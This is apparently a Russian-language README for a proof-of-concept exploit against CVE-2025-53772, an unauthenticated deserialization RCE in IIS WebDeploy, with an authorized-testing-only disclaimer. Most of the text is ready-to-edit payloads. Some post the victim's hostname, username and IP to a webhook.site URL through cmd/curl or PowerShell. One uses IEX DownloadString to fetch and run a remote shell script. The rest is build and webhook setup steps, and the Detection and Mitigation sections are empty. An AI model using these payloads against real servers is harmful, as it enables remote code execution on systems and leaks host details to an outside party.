
Эксплойт proof-of-concept для CVE-2025-53772 — уязвимости удалённого выполнения кода в IIS WebDeploy через небезопасную десериализацию. Включает настраиваемую генерацию полезных нагрузок для сбора информации, выполнения команд и обратных оболочек.
Этот репозиторий содержит эксплойт Proof-of-Concept (PoC) для CVE-2025-53772 — уязвимости удалённого выполнения кода в IIS WebDeploy, вызванной небезопасной десериализацией.
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением. Используйте только на системах, которыми вы владеете, или на которые у вас есть явное разрешение на тестирование.
Отредактируйте полезную нагрузку в файле poc.cs в строках 18–19, чтобы указать целевое действие: csharp// Замените на ваш URL вебхука и желаемую полезную нагрузку
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");
Сбор информации (рекомендуется):
csharpset.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");
Простое выполнение команд:
csharpset.Add("cmd.exe");
set.Add("/c calc.exe"); // Opens calculator
Обратная оболочка (продвинутый уровень):
csharpset.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");
GitHub Action автоматически скомпилирует PoC и сгенерирует полезную нагрузку в кодировке Base64:


Затронутое программное обеспечение: IIS WebDeploy (несколько версий) Тип уязвимости: Небезопасная десериализация, приводящая к RCE Вектор атаки: Удалённый, без аутентификации Серьёзность: Критическая
Если вы предпочитаете компилировать локально, а не через GitHub Actions: bash# Windows с .NET Framework C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs poc.exe > payload.txt
csc poc.cs poc.exe 📡 Настройка вебхука
Перейдите на webhook.site, чтобы получить бесплатный URL вебхука Замените YOUR-WEBHOOK-ID в полезной нагрузке на ваш уникальный идентификатор Отслеживайте входящие запросы, чтобы увидеть результаты выполнения эксплойта
Обнаружение:
Смягчение:
Подробности CVE-2025-53772 Уведомление Microsoft о безопасности База данных уязвимостей NIST